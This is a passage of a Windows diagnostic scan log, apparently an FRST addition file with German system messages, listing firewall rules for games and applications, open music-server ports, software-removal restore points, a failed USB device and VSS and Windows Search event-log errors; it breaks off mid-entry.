FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

31-07-2017 01:36:50 Removed simplitec simplicheck
01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point
05-08-2017 22:59:27 Revo Uninstaller's restore point - Adobe Acrobat Reader DC - Deutsch
05-08-2017 23:02:31 Revo Uninstaller's restore point - 7-Zip 9.20 (x64 edition)
05-08-2017 23:03:57 Revo Uninstaller's restore point - Avira Antivirus
05-08-2017 23:06:04 Revo Uninstaller's restore point - Advanced SystemCare 10
05-08-2017 23:11:19 Revo Uninstaller's restore point - Avira System Speedup
05-08-2017 23:12:26 Revo Uninstaller's restore point - Batman: Arkham City GOTY
05-08-2017 23:13:06 Revo Uninstaller's restore point - Avira Software Updater
05-08-2017 23:13:13 Removed Avira Software Updater
05-08-2017 23:13:50 Revo Uninstaller's restore point - Avira Connect
05-08-2017 23:14:16 Revo Uninstaller's restore point - Avira Phantom VPN
05-08-2017 23:14:52 Revo Uninstaller's restore point - Avira Connect
05-08-2017 23:15:50 Revo Uninstaller's restore point - Deus Ex: Mankind Divided™
05-08-2017 23:16:28 Revo Uninstaller's restore point - Dying Light
05-08-2017 23:16:56 Revo Uninstaller's restore point - Fallout: New Vegas
05-08-2017 23:17:21 Revo Uninstaller's restore point - Driver Booster 4.5
05-08-2017 23:17:55 Revo Uninstaller's restore point - Command & Conquer™ Red Alert 2 and Yuri’s Revenge
05-08-2017 23:18:51 Revo Uninstaller's restore point - Mozilla Firefox 54.0.1 (x86 de)
05-08-2017 23:19:55 Revo Uninstaller's restore point - System Shock 2
05-08-2017 23:20:31 Revo Uninstaller's restore point - Smart Defrag 5
05-08-2017 23:22:02 Revo Uninstaller's restore point - Metro: Last Light
05-08-2017 23:22:32 Revo Uninstaller's restore point - Futuremark SystemInfo
05-08-2017 23:22:38 Removed Futuremark SystemInfo
05-08-2017 23:23:32 Revo Uninstaller's restore point - The Banner Saga 2
05-08-2017 23:24:33 Revo Uninstaller's restore point - State of Decay
05-08-2017 23:25:37 Revo Uninstaller's restore point - 3DMark
05-08-2017 23:27:30 Revo Uninstaller's restore point - State of Decay
05-08-2017 23:28:01 Revo Uninstaller's restore point - WestwoodOnline
05-08-2017 23:28:29 Revo Uninstaller's restore point - WestwoodOnline
05-08-2017 23:29:30 Revo Uninstaller's restore point - Skype Click to Call
05-08-2017 23:30:19 Revo Uninstaller's restore point - Skype Click to Call
05-08-2017 23:41:58 Revo Uninstaller's restore point - Jade Empire
06-08-2017 00:18:38 Revo Uninstaller's restore point - Free Studio
06-08-2017 00:19:24 Revo Uninstaller's restore point - IObit Uninstaller
06-08-2017 00:31:22 Revo Uninstaller's restore point - Free Studio
06-08-2017 00:33:21 Revo Uninstaller's restore point - Trojan Remover
06-08-2017 00:59:33 Revo Uninstaller's restore point - GNU Image Manipulation Program

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/06/2017 12:59:33 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {2b4a2dd8-1805-4ac5-9545-b2b4e5183952}

Error: (08/06/2017 12:54:05 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:53:54 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:33:21 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed

System Error:
Das System kann die angegebene Datei nicht finden.
.

Error: (08/06/2017 12:33:21 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2}

Error: (08/06/2017 12:31:23 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed

System Error:
Das System kann die angegebene Datei nicht finden.
.

Error: (08/06/2017 12:31:21 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2}

Error: (08/06/2017 12:23:06 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:22:46 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:22:31 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
